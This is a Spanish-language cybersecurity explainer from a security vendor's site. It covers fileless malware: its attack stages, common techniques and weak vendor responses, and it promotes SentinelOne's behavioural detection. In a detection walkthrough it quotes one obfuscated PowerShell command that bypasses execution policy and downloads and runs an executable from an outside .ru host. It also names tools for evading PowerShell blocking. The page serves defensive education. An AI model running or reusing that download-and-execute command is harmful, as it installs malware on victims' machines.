Líder en el Cuadrante Mágico de Gartner® de 2025 para plataformas de protección de Endpoints. Cinco añLíder en el Cuadrante Mágico™ de GartnerLeer el informe
¿Sufre una brecha de seguridad?Blog
ComenzarContacto
Header Navigation - ES
  • Plataforma
    Resumen de la plataforma
    • Singularity Platform
      Bienvenido a la Seguridad Empresarial Integrada
    • Cómo funciona
      La Diferencia de Singularity XDR
    • Marketplace de Singularity
      Integraciones con un solo clic para liberar la potencia de XDR
    • Precios y Paquetes
      Comparaciones y orientaciones de un vistazo
    Data & AI
    • Purple AI
      Acelerar las operaciones de seguridad con IA generativa
    • Singularity Hyperautomation
      Automatice fácilmente los procesos de seguridad
    • AI-SIEM
      AI SIEM para el SOC autónomo
    • Singularity Data Lake
      Potenciada por la IA, unificada por el lago de datos
    • Singularity Data Lake for Log Analytics
      Ingesta de datos sin fisuras desde entornos locales, en la nube o híbridos
    Endpoint Security
    • Singularity Endpoint
      Prevención, detección y respuesta autónomas
    • Singularity XDR
      Protección, detección y respuesta nativas y abiertas
    • Singularity RemoteOps Forensics
      Orquestación forense a escala
    • Singularity || Threat Intelligence
      Información completa sobre el adversario
    • Singularity Vulnerability Management
      Detección de activos no autorizados
    Cloud Security
    • Singularity Cloud Security
      Bloquee los ataques con un CNAPP basado en IA
    • Singularity Cloud || Native Security
      Asegurar la nube y los recursos de desarrollo
    • Singularity Cloud Workload Security
      Plataforma de protección de la carga de trabajo en la nube en tiempo real
    • Singularity || Cloud Data Security
      Detección de amenazas mediante inteligencia artificial
    • Singularity Cloud Security Posture Management
      Detectar y corregir errores de configuración en la nube
    Identity Security
    • Singularity Identity
      Detección de amenazas y respuesta para la identidad
  • ¿Por qué SentinelOne?
    ¿Por qué SentinelOne?
    • ¿Por qué SentinelOne?
      Ciberseguridad pensada para el futuro
    • Nuestros clientes
      La confianza de las principales empresas del mundo
    • Reconocimiento industrial
      Probado y demostrado por los expertos
    • Quiénes somos
      Líder del sector en ciberseguridad autónoma
    Comparar SentinelOne
    • Arctic Wolf
    • Broadcom
    • CrowdStrike
    • Cybereason
    • Microsoft
    • Palo Alto Networks
    • Sophos
    • Splunk
    • Trend Micro
    • Trellix
    • Wiz
    Industria
    • Energía
    • Administración Pública
    • Finanzas
    • Sanidad
    • Educación
    • Educación K-12
    • Fabricación
    • Comercio
    • Sector público estatal y local
  • Servicios
    Servicios gestionados
    • Visión General de Servicios Gestionados
      Wayfinder Threat Detection & Response
    • Threat Hunting
      Experiencia de clase mundial e Inteligencia de Amenazas.
    • Managed Detection & Response
      Services MDR experts 24/7/365 pour l’ensemble de votre environnement.
    • Incident Readiness & Response
      Analyses forensiques, IRR et préparation aux incidents.
    Asistencia y despliegue
    • Gestión técnica de cuentas
      Customer success con servicio personalizado
    • SentinelOne GO
      Asesoramiento guiado sobre incorporación y despliegue
    • SentinelOne University
      Formación en directo y a la carta
    • Panorama de los servicios
      Soluciones integrales para operaciones de seguridad sin interrupciones
    • SentinelOne Community
      Inicio de sesión en la comunidad
  • Partners
    Nuestra red
    • Socios MSSP
      Triunfe más rápido con SentinelOne
    • Marketplace de Singularity
      Extender la potencia de la tecnología S1
    • Socios de ciberriesgo
      Incorporar equipos de respuesta y asesoramiento profesional
    • Alianzas tecnológicas
      Soluciones integradas a escala empresarial
    • SentinelOne para AWS
      Alojado en regiones de AWS en todo el mundo
    • Socios de canal
      Aportar juntos las soluciones adecuadas
    Descripción general del programa →
  • Recursos
    Centro de recursos
    • Datasheets
    • eBooks
    • Videos
    • Libros blancos
    • Events
    Ver todos los recursos→
    Blog
    • Feature Spotlight
    • For CISO/CIO
    • From the Front Lines
    • Identity
    • Cloud
    • macOS
    • Blog de SentinelOne
    Blog→
    Recursos tecnológicos
    • SentinelLABS
    • Glosario de ransomware
    • Ciberseguridad 101
  • Quiénes somos
    Acerca SentinelOne
    • Acerca SentinelOne
      El líder de la industria en ciberseguridad
    • SentinelLABS
      Investigación de amenazas para el cazador de amenazas moderno
    • Carreras
      Las últimas oportunidades de trabajo
    • Prensa y noticias
      Anuncios de la empresa
    • Blog de ciberseguridad
      Las últimas amenazas a la ciberseguridad, noticias y más
    • FAQ
      Obtenga respuestas a las preguntas más frecuentes
    • DataSet
      La Plataforma de datos en vivo
    • S Foundation
      Asegurar un futuro más seguro para todos
    • S Ventures
      Invertir en la próxima generación de seguridad y datos
ComenzarContacto
Background image for ¿Qué es el malware sin archivos? ¿Cómo detectarlo y prevenirlo?
Cybersecurity 101/Inteligencia sobre amenazas/Malware sin archivos

¿Qué es el malware sin archivos? ¿Cómo detectarlo y prevenirlo?

El malware sin archivos funciona sin archivos tradicionales, lo que dificulta su detección. Comprenda sus tácticas y cómo defenderse de esta amenaza en constante evolución.

CS-101_Threat_Intel.svg
Tabla de contenidos

Entradas relacionadas

  • ¿Qué es la detección y respuesta ante amenazas (TDR)?
  • ¿Qué son los ataques de fuerza bruta?
  • ¿Qué es la ciberresiliencia? Ventajas y retos
  • ¿Qué es el malware polimórfico? Ejemplos y retos
Actualizado: July 29, 2025

El malware sin archivos funciona sin archivos tradicionales, lo que dificulta su detección. Esta guía explora cómo funciona el malware sin archivos, sus métodos de infección y los riesgos que supone para las organizaciones.

Descubra estrategias eficaces de detección y prevención para combatir esta amenaza sigilosa. Comprender el malware sin archivos es fundamental para mejorar las defensas de ciberseguridad.

El informe SentinelOne H1 2018 Enterprise Risk Index Report muestra que los ataques basados en archivos sin archivos aumentaron un 94 % entre enero y junio. Los ataques de PowerShell se dispararon de 2,5 ataques por cada 1000 terminales en mayo de 2018 a 5,2 ataques por cada 1000 terminales en junio.

En los últimos años, los actores maliciosos han recurrido cada vez más al malware sin archivos como una alternativa muy eficaz.

Malware sin archivos: imagen destacada | SentinelOne

¿Qué es el malware sin archivos?

El malware sin archivos es un código malicioso que no requiere el uso de un archivo ejecutable en el sistema de archivos del endpoint, aparte de los que ya están allí. Normalmente se inyecta en algún proceso en ejecución y se ejecuta solo en la RAM. Esto hace que sea mucho más difícil de detectar y prevenir para el software antivirus tradicional y otros productos de productos de seguridad de terminales detectarlo o prevenirlo, debido a su bajo impacto y a la ausencia de archivos que escanear.

Un ejemplo que afectó a Estados Unidos, Canadá y Europa, los atacantes lanzaron una campaña de spam que enviaba documentos Word maliciosos que ejecutaban macros al abrirlos, distribuyendo malware sin archivos en el proceso. En casos como este, "sin archivos" se refiere al hecho de que los atacantes aprovechan Windows PowerShell para cargar un archivo ejecutable directamente en la memoria en lugar de escribirlo en el disco (donde puede ser detectado por los escáneres de malware habituales).

Hay muchas otras formas de ejecutar código en un dispositivo sin utilizar archivos ejecutables. A menudo se utilizan procesos del sistema disponibles y en los que confía el sistema operativo.

Algunos ejemplos son:

  • VBScript
  • JScript
  • Archivos por lotes
  • PowerShell
  • Instrumental de administración de Windows (WMI)
  • Mshta y rundll32 (u otros archivos firmados por Windows capaces de ejecutar código malicioso)

El malware oculto en documentos también es un tipo de ataque sin archivos

Más allá del ataque sin archivos que utiliza archivos del sistema para ejecutar código malicioso, otro tipo de ataque común y considerado sin archivos es el malware oculto en documentos. Aunque estos archivos de datos no pueden ejecutar código, existen vulnerabilidades en Microsoft Office y en los lectores de PDF que los adversarios pueden aprovechar para obtener la ejecución de código. Por ejemplo, un documento infectado podría activar un comando malicioso PowerShell. También hay algunas funciones integradas que permiten la ejecución de código dentro de los documentos, como macros y ataques DDE.

¿Cómo funciona el malware sin archivos?

La forma más común de malware sin archivos en circulación es cuando la víctima hace clic en un enlace de spam dentro de un correo electrónico o un sitio web fraudulento.

A continuación, ese enlace o sitio web carga la aplicación Flash e implementa un exploit relevante para infectar el equipo del usuario. A continuación, el malware utiliza código shell para ejecutar un comando que le permite descargar y ejecutar la carga útil únicamente en la memoria.

Esto significa que no queda rastro de su actividad. Dependiendo de los objetivos del hacker, el malware podría comprometer datos confidenciales, causar daños al ordenador de la víctima o realizar otras acciones perjudiciales, como el robo y el cifrado de datos.

Los hackers suelen hacerse pasar por una fuente fiable o familiar para convencer a la víctima de que haga clic en el enlace que le proporcionan. Esto es especialmente eficaz en entornos formales, en los que la víctima cree que un empleado o ejecutivo de su empresa se está poniendo en contacto con ella.

La conclusión clave aquí es que este tipo de ataque de malware se basa en la ingeniería social para tener éxito.

Características del malware sin archivos

Este tipo de software malicioso utiliza programas que ya se encuentran en el ordenador. Su comportamiento no puede ser detectado por los escáneres heurísticos y no tiene ningún código o firma identificable.

Además, el malware sin archivos reside en la memoria del sistema.

Para funcionar, aprovecha los procesos del sistema operativo infectado. El malware sin archivos más avanzado también se puede combinar con otros tipos de malware para facilitar ciberataques complejos. Incluso puede eludir tanto las listas blancas como los entornos aislados en las circunstancias adecuadas.

Etapas de un ataque de malware sin archivos

Un ataque de malware sin archivos es bastante singular en cuanto a su funcionamiento. Comprender cómo opera puede ayudar a una organización a protegerse contra futuros ataques de malware sin archivos. Veamos lo que hay que saber.

1. El malware obtiene acceso al equipo

Antes de que un actor malicioso pueda llevar a cabo su ataque de malware por completo, primero debe obtener acceso al equipo de la víctima, a menudo mediante un correo electrónico de phishing o una táctica de ingeniería social. Una vez hecho esto, puede comenzar a implementar las etapas adicionales del proceso.

Otra forma de obtener acceso al equipo de la víctima es a través de credenciales comprometidas. Al robar las credenciales, el hacker puede tener libre acceso al sistema y luego utilizar esta información para acceder a otros entornos. Por ejemplo, obtener el acceso inicial al equipo puede no proporcionar al hacker los privilegios que necesita, pero puede conseguir las credenciales para obtener estos datos.

2. El programa establece la persistencia

Después de obtener acceso, el malware establece una puerta trasera que permite al hacker acceder al equipo cuando lo desee. El objetivo principal de esta acción es evitar perder el acceso al dispositivo para poder continuar recopilando información durante largos periodos de tiempo.

3. Exfiltración de datos

La etapa final es la exfiltración de datos. Una vez que el atacante localiza la información que necesita, los datos se exfiltran a otro entorno. Esto le permite obtener datos confidenciales sin ser detectado durante largos periodos de tiempo y puede funcionar de forma repetida tantas veces como sea necesario.

Técnicas comunes de malware sin archivos

Un buen conocimiento de las diferentes técnicas le ayudará a aprender a reconocer un ataque en el futuro. A continuación se presentan seis tipos de malware que pueden aprovechar las capacidades sin archivos para mejorar la capacidad de evitar la detección:

1. Malware residente en memoria

Al utilizar el espacio de memoria de un archivo real de Windows, los atacantes pueden cargar código malicioso que permanece inactivo hasta que se activa. El aspecto sin archivos es que el software antivirus estándar de análisis de archivos no puede detectar el malware.

Dado que los rootkits residen en el núcleo del sistema en lugar de en un archivo, tienen una gran capacidad para evitar ser detectados. Son 100 % sin archivos, pero encajan en esta categoría a medida que evoluciona.

3. Malware del Registro de Windows

Al igual que en el ejemplo mencionado anteriormente, estos ataques aprovechan la base de datos del Registro de Windows, que almacena la configuración de bajo nivel de diversas aplicaciones. El malware se basa en código ejecutado a través de un archivo, pero este archivo está configurado para autodestruirse después de su ejecución, lo que permite que el malware persista sin archivos.

4. Credenciales falsas

Como su nombre indica, este ataque consiste en utilizar credenciales comprometidas de un usuario legítimo (es decir, nombre de usuario y contraseña robados). Una vez que el hacker ha obtenido acceso al sistema, implementa un código shell para facilitar su ataque a la máquina.

En casos extremos, puede incluso colocar código dentro del registro para establecer un acceso continuo al ordenador.

5. Ransomware sin archivos

Para aquellos que no estén familiarizados con este tipo de malware, ransomware es un programa malicioso que utilizan los hackers para extorsionar a sus víctimas. A menudo cifran datos confidenciales y amenazan con eliminarlos a menos que se pague una determinada cantidad de dinero, normalmente a través de criptomonedas.

Cuando se produce este tipo de ataque sin archivos, los hackers pueden atacar sin necesidad de escribir en el disco de la máquina. Esto hace que sea difícil de detectar hasta que es demasiado tarde.

6. Kits de explotación

Los actores maliciosos utilizan un conjunto de herramientas conocidas como kits de explotación para aprovechar las vulnerabilidades del ordenador de la víctima. Estos ataques suelen comenzar como un ataque típico de malware sin archivos, lo que significa que a menudo convencen al usuario para que haga clic en un enlace fraudulento.

Una vez que el programa logra infiltrarse en la máquina, el kit de explotación puede escanear el sistema para determinar las vulnerabilidades que puede aprovechar y luego crear un conjunto específico de exploits para implementar. A menudo, el malware pasa desapercibido y obtiene un amplio acceso al sistema y a los datos.

El problema para las empresas

Una de las razones por las que el malware sin archivos es tan atractivo es que los productos de seguridad no pueden simplemente bloquear los archivos del sistema o el software que se utilizan en este tipo de ataques. Por ejemplo, el mantenimiento de TI se vería afectado si un administrador de seguridad bloqueara PowerShell. Lo mismo se aplica al bloqueo de documentos o macros de Office, lo que probablemente tendría un impacto aún mayor en la continuidad del negocio.

El menor impacto y la ausencia de ejecutables "extraños" que analizar dificultan que los antivirus tradicionales y otros productos de seguridad para puntos finales detecten o prevengan este tipo de ataques.

El problema para los proveedores

Las empresas comprenden que la falta de una protección eficaz contra el malware sin archivos podría dejar a su organización en una situación de extrema vulnerabilidad. Como resultado, los proveedores de seguridad se vieron presionados para hacer frente a esta creciente amenaza y crearon todo tipo de parches para reivindicar (o demostrar) su cobertura contra los "ataques sin archivos". Desgraciadamente, muchos de estos intentos de resolver el problema distan mucho de ser ideales. A continuación se presentan algunas de las soluciones estándar y las razones por las que son inadecuadas:

Bloqueo de PowerShell

Como se ha señalado anteriormente, PowerShell se ha convertido en una herramienta esencial para los equipos de TI y ha sustituido en gran medida a la antigua herramienta cmd de Microsoft como utilidad de línea de comandos predeterminada. Bloquearla causaría graves trastornos a los equipos de TI. Y lo que es más importante, desde el punto de vista defensivo, bloquearla sería inútil: Existen muchas fuentes públicas que explican cómo eludir la política de ejecución de PowerShell y otras formas de utilizarlo que eluden el bloqueo de PowerShell.exe. Por nombrar algunas:

  • Ejecutar PowerShell solo con dll, con un simple comando rundll32 utilizando PowerShdll
  • Convertir scripts de PowerShell en otros archivos EXE, con herramientas como PS2EXE
  • Utilizar malware que utilice su propia copia de PowerShell.exe o modifique el PowerShell local para evitar que los productos de seguridad reconozcan PowerShell
  • Incrustar un script de PowerShell en los píxeles de un archivo PNG y generar una línea única para ejecutarlo utilizando Invoke-PSImage

Bloqueo de archivos de macros de MS Office

Para eliminar este vector de ataque, Microsoft añadió una opción para desactivar las macros como configuración del sitio (a partir de Office 2016). Sin embargo, la mayoría de los entornos aún las permiten, por lo que los proveedores de seguridad han abordado esto principalmente de dos maneras:

  • Bloquear macros de forma generalizada: esto impone las mismas restricciones que ofrece Microsoft a las organizaciones que pueden prescindir de las macros
  • Extraer el código de la macro para realizar análisis estáticos o comprobaciones de reputación: esto puede funcionar en algunos casos. Sin embargo, el inconveniente de este enfoque es que dicho código es extremadamente difícil de clasificar y detectar dentro de un índice de falsos positivos tolerable, especialmente en el caso de macros maliciosas nunca vistas antes. Además, existen muy pocos repositorios de código benigno y malicioso. Otra opción es buscar funciones comunes que suelen encontrarse en los ataques, pero, de nuevo, estas son variables y no están ampliamente catalogadas

Detección del lado del servidor

Algunos productos utilizan únicamente la supervisión del lado del agente y toman la decisión en el servidor o en la nube. Este enfoque tiene las mismas desventajas que cualquier detección que no se realice en el punto final. Principalmente, para que funcione, requiere conectividad y la prevención es imposible porque el agente tiene que esperar a que el servidor responda antes de actuar.

Cómo detectar el malware sin archivos

El malware sin archivos es una de las amenazas más difíciles de detectar para el software antivirus tradicional y los productos de ciberseguridad heredados, ya que puede evadir los métodos de seguridad heredados basados en firmas, listas blancas y entornos aislados.

Una buena forma de mantener su organización a salvo del malware sin archivos es contar con un equipo de búsqueda de amenazas que busque activamente el malware.

Los indicadores de ataque se ocultarán y mezclarán dentro del entorno de una organización. Hay varias formas en que esto puede aparecer en un sistema y se necesita un profundo conocimiento de las amenazas para descubrir el malware sin archivos.

Comportamiento, no identidad

La clave está en observar el comportamiento de los procesos que se ejecutan en el punto final, en lugar de inspeccionar los archivos de la máquina. Esto es eficaz porque, a pesar del gran y creciente número de variantes de malware, estas funcionan de manera muy similar. El número de comportamientos de malware es considerablemente menor que el número de formas que puede adoptar un archivo malicioso, lo que hace que este enfoque sea adecuado para la prevención y la detección.

Aunque SentinelOne utiliza múltiples motores, incluyendo IA estática y de comportamiento, el enfoque basado en el comportamiento es extremadamente eficaz para detectar y prevenir este tipo de ataques, ya que es independiente del vector de ataque.

La eficacia de este enfoque queda demostrada en ejemplos como la campaña WannaCry, en la que SentinelOne fue capaz de defender a sus clientes antes de que el ransomware se hubiera detectado en la red.

Mejore su inteligencia sobre amenazas

Descubra cómo WatchTower, el servicio de caza de amenazas de SentinelOne, puede proporcionarle más información y ayudarle a superar los ataques.

Más información

Cómo SentinelOne detiene el malware sin archivos

SentinelOne supervisa todas las actividades del lado del agente a nivel del núcleo para diferenciar entre actividades maliciosas y benignas. Dado que el agente ya tiene todo el contexto: usuarios, procesos, argumentos de línea de comandos, registro, archivos en el disco y comunicaciones externas, cualquier actividad maliciosa puede mitigarse por completo. SentinelOne puede revertir todas las acciones maliciosas y permitir al usuario trabajar en un dispositivo limpio.

Básicamente, SentinelOne le permite prescindir de los costes ocultos que supone mantener su red limpia de código malicioso en toda su red.

Contenido activo

Para implementar este enfoque de manera eficaz, SentinelOne emplea el concepto "StoryLine", que resuelve el problema de atribuir la culpa a la causa raíz de la actividad maliciosa.

Por ejemplo, supongamos que un usuario descarga un archivo adjunto malicioso a través de Outlook, que luego intenta cifrar los archivos del disco. En este escenario, culpar y poner en cuarentena a Outlook como proceso principal significaría pasar por alto la verdadera fuente de la actividad maliciosa. En cambio, Outlook debería incluirse como fuente de datos forenses para mostrar, pero no para mitigar. Sin embargo, lo que se desea es mitigar todo el grupo de amenazas, independientemente de los archivos adicionales que se hayan descargado, las claves de registro creadas o cualquier otro comportamiento dañino.

El uso de StoryLine nos permite determinar —y señalar como responsable— la causa raíz de un flujo malicioso determinado, con o sin un archivo, y permite al cliente gestionar el incidente con precisión.

SentinelOne Attack Storyline

Guía de detección y mitigación

Veamos un flujo en el que el usuario ha recibido un documento de Word a través de un correo electrónico cifrado. El usuario conoce al remitente y, por lo tanto, descarga el documento en su escritorio y lo abre. Una vez abierto el archivo, obtiene lo siguiente:

ventana emergente de malware sin archivo

Una vez que se hace clic en "Sí", el ataque se pone en marcha. Veamos qué detecta el agente SentinelOne (que se ejecuta en modo Detectar para este ejemplo).

El agente SentinelOne detecta run_me.docx

El administrador puede examinar exactamente cómo cada elemento involucrado en esta historia contribuyó al ataque.

SentinelOne muestra la línea de comandos exacta que invoca el comando PowerShell:

-ExECUtiONpOlIcy BYpAsS -NoPROfILE -WInDOWSTYLe HIdDEN (neW-oBJeCT SysTem.NeT.weBcliENT).doWNlOADfilE('http://v32gy.worldnews932.ru/file/nit.nbv','C:UsersadminAppDataRoaming.exE');START-proceSS 'C:UsersadminAppDataRoaming.exE'

En una situación real, el agente SentinelOne mitiga inmediatamente el problema. Esto ocurre de forma automática, sin necesidad de que el administrador tenga que realizar ninguna acción. El administrador recibe una notificación por SMS, SIEM o correo electrónico.

Conclusión

En última instancia, los adversarios siempre tomarán el camino más corto para comprometer los puntos finales con el fin de obtener el mayor rendimiento con el menor esfuerzo. El malware sin archivos se está convirtiendo rápidamente en una de las formas más populares de hacerlo, y para prevenir este tipo de ataques, no basta con bloquear operaciones esenciales como PowerShell. Aquí es donde SentinelOne, basado en la detección de IA basada en el comportamiento y la seguridad por capas, realmente destaca, ya que cubre exploits, documentos macro, kits de exploits, PowerShell, PowerSploit y vulnerabilidades de día cero a nivel local sin afectar a la productividad diaria de sus empleados.

Solicite una demostración y obtenga más información sobre cómo SentinelOne puede protegerle del malware sin archivos y los ataques de día cero.

"

Preguntas frecuentes sobre malware sin archivos

El malware sin archivos es un código malicioso que opera en la memoria y no depende de archivos almacenados en el disco. Abusa de herramientas legítimas como PowerShell o WMI para llevar a cabo ataques, dejando pocos o ningún rastro que los antivirus tradicionales puedan detectar. Los atacantes lo utilizan para evitar ser detectados y mantener la persistencia hasta que consiguen lo que quieren.

Un correo electrónico de phishing introduce una macro maliciosa en un documento de Word. La macro ejecuta un script de PowerShell directamente en la memoria, descarga cargas útiles y crea puertas traseras, todo ello sin guardar ningún archivo en el disco. El ataque abusa de los procesos confiables del sistema, lo que dificulta mucho su detección por parte de las herramientas de seguridad estándar.

El malware sin archivos puede robar datos, desplegar ransomware, instalar puertas traseras o dar a los atacantes el control total de sus sistemas. Dado que utiliza procesos legítimos y rara vez toca el disco, es difícil de detectar y puede permanecer en la memoria durante mucho tiempo, lo que permite a los atacantes mantener el acceso o adentrarse más en su red.

Las técnicas comunes implican el uso indebido de PowerShell, WMI, el Registro de Windows y las macros. Los atacantes utilizan inyección de DLL reflexiva, scripts maliciosos y binarios que viven de la tierra (LOLBins) para evitar escribir archivos.

Pueden utilizar tareas programadas o exploits residentes en memoria, por lo que la carga útil desaparece después de un reinicio o de la eliminación del proceso.

Puede supervisar la actividad sospechosa de scripts, el uso inusual de PowerShell o WMI y las anomalías de memoria. Las plataformas de detección y respuesta de endpoints (EDR) ayudan registrando la actividad de la línea de comandos y el comportamiento de los procesos. Esté atento a nuevas tareas programadas, cambios en el registro y conexiones de red inesperadas que puedan indicar operaciones sin archivos.

Los sistemas pueden funcionar con lentitud, mostrar procesos desconocidos en la memoria o generar tráfico de red extraño. Es posible que observe actividad inesperada de PowerShell o WMI, nuevas tareas programadas o modificaciones del registro. Los antivirus tradicionales no detectarán gran cosa, por lo que deberá buscar pistas de comportamiento e inestabilidad del sistema.

Desactive las herramientas de scripting innecesarias, limite los privilegios de los usuarios y mantenga todo el software actualizado. Utilice soluciones EDR para supervisar el uso de la memoria y los scripts. Forme a su personal para que no abra correos electrónicos o archivos adjuntos sospechosos.

Bloquee las macros de forma predeterminada y audite periódicamente sus sistemas en busca de comportamientos inusuales y conexiones de red abiertas.

Descubre más sobre Inteligencia sobre amenazas

¿Qué es el adware? Consejos para su detección y prevenciónInteligencia sobre amenazas

¿Qué es el adware? Consejos para su detección y prevención

Esta guía detallada explica qué es el adware, incluyendo su definición, vías de infección, métodos de detección y consejos de prevención. Aprenda a eliminar el adware, proteger sus dispositivos y proteger a su empresa de las amenazas del adware.

Seguir leyendo
¿Qué son los indicadores de compromiso (IoC)?Inteligencia sobre amenazas

¿Qué son los indicadores de compromiso (IoC)?

Los indicadores de compromiso (IOC) ayudan a identificar las brechas de seguridad. Descubra cómo utilizar los IOC para detectar y responder eficazmente a las amenazas.

Seguir leyendo
¿Qué es un exploit en ciberseguridad?Inteligencia sobre amenazas

¿Qué es un exploit en ciberseguridad?

Es fundamental comprender los exploits y defenderse de ellos. Explore los diferentes tipos de exploits y las medidas prácticas que puede tomar para proteger sus sistemas de posibles amenazas.

Seguir leyendo
¿Qué es la ingeniería de detección?Inteligencia sobre amenazas

¿Qué es la ingeniería de detección?

Esta guía explica la ingeniería de detección, cubriendo su definición, propósito, componentes clave, mejores prácticas, relevancia en la nube y su papel en la mejora de la visibilidad y la protección de las amenazas en tiempo real.

Seguir leyendo
  • Comenzar
  • Solicitar una demo
  • Recorrido por el producto
  • Por qué SentinelOne
  • Precios y Paquetes
  • FAQ
  • Contacto
  • Contacto
  • Soporte
  • SentinelOne Status
  • Idioma
  • Español
  • Plataforma
  • Singularity Platform
  • Singularity Endpoint
  • Singularity Cloud
  • Singularity AI-SIEM
  • Singularity Identity
  • Singularity Marketplace
  • Purple AI
  • Servicios
  • Wayfinder TDR
  • SentinelOne GO
  • Gestión técnica de cuentas
  • Servicios de apoyo
  • Industria
  • Energía
  • Administración Pública
  • Finanzas
  • Sanidad
  • Educación
  • Educación K-12
  • Fabricación
  • Comercio
  • Sector público estatal y local
  • Cybersecurity for SMB
  • Recursos
  • Blog
  • Labs
  • Videos
  • Recorrido por el producto
  • Events
  • Cybersecurity 101
  • eBooks
  • Libros blancos
  • Prensa
  • News
  • Glosario de Ransomware
  • Empresa
  • Quiénes somos
  • Nuestros clientes
  • Carreras
  • Partners
  • Legal & Compliance
  • Declaración de seguridad
  • S Foundation
  • S Ventures

©2025 SentinelOne, Todos los derechos reservados.

Confidencialidad Condiciones de uso